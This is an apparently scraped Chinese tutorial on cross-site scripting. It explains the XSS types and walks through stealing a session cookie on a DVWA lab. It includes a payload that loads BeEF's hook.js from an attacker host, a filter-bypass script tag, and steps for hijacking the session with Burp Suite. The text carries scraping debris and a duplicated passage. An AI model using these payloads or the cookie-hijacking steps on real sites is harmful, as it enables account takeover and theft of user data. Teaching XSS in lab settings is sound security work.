网站做的比较好的公司吗,seo是什么推广,wordpress访问量大,一件代发50个货源网站what
xss漏洞----跨站脚本攻击#xff08;Cross Site Scripting#xff09;#xff0c;攻击者在网页中注入恶意脚本代码#xff0c;使受害者在浏览器中运行该脚本#xff0c;从而达到攻击目的。
分类
反射型---最常见#xff0c;最广泛 用户将带有恶意代码的url打开Cross Site Scripting攻击者在网页中注入恶意脚本代码使受害者在浏览器中运行该脚本从而达到攻击目的。
分类
反射型---最常见最广泛 用户将带有恶意代码的url打开网站服务端将恶意代码从 URL 中取出拼接在 HTML 中返回给浏览器。浏览器响应并执行恶意代码
存储型---危害大难察觉
与前者本质区别是前者是将恶意代码以payload形式写入url只有在受害者点击该url会执行恶意代码所以反射型也就在非持久型。而存储型是直接将恶意代码通过评论,注册等方式存入web服务器只要查询到数据库中被污染的内容都会被执行恶意代码因此存储型也叫持久型。
DOM型---鸡肋
如何判断网站是否有xss漏洞
最简单的就是执行javascript弹出代码若成功弹出说明网站对于JavaScript代码没有过滤(弹窗(恶意代码)在当前页面执行说明该页面为回显点) 反射型回显点一般就是请求提交后的响应页面但是存储型并非能直接响应(如在评论中写入恶意代码但是xss却在管理员在管理后台时才触发管理后台则是存在xss漏洞这种预先注入payload的方式叫做----xss盲打是否触发可以根据beef等平台监测)
危害
网络钓鱼盗取各种用户账户。
窃取用户的cookies资料从而获取用户隐私信息。
弹出广告页面获取相关利益。
劫持用户会话执行任意操作。
传播蠕虫病毒。
beef平台盗取cookie实现免登录
环境工具
dvwa靶场xss漏洞(low security)
kali beef-xss(自带但是需要安装第一次加载会让我们修改密码 默认账号密码都是beef)
kali burp suite script srchttp://IP:3000/hook.js/script 将IP换为kali IP 写入dvwa中 注意要改一下长度默认50写入不全代码 http://127.0.0.1:3000/ui/pane
执行beef-xss加载完后默认进入这个页面要你输入账号密码然后上图是进入后的页面显示在线网页的IP就是靶场的IP若没有显示可以刷新看看或在Current-Commands-get-cooike重新获取一下注意要点击右下角才能获取cookie这些变化会直接更新Details 注意这里uri/referrer的地址一致在这里我把uri理解为回显点的网页地址 referrer为该网页的跳转前的地址 打开kali中的burp suit通过自带浏览器(open browser)进行抓包---注意要点击小齿轮设置关闭沙箱要不然浏览器打不开
我们将beef平台的uri地址加载发现是跳到登录界面这是因为我们还没有载入cookie信息我们开启拦截再在该页面重新加载一次uri
这时拦截到的包是有cookie信息的我们需要beef平台的cookie换到这里放包 好玩的实用的
弹窗 重定向页面 功能颜色标识
beef-XSS使用四种颜色来标识功能的可用性。
「绿色」可以运行且用户不会感觉出异常「橙色」可以运行但用户可能感到异常弹窗等「灰色」未验证不确定是否可以使用「红色」不可用
攻防
很多网站可能直接就禁止JavaScript的注入通过基本变形看看是否绕过
大小写
空格/换行
安全过滤函数--scrscriptiptalert(document.domain)/script
编码绕过---HTML 实体编码的字符
----以上是防守兼备互相提示
HTTP only----Cookie 的 HtpOnly 属性其作用是让客户端 JavaScript 代码不能读取 Cookie.但是在 HTTP 请求中还是会正常发送 Cookie
waf---输入过滤 输出转义 内置安全机制
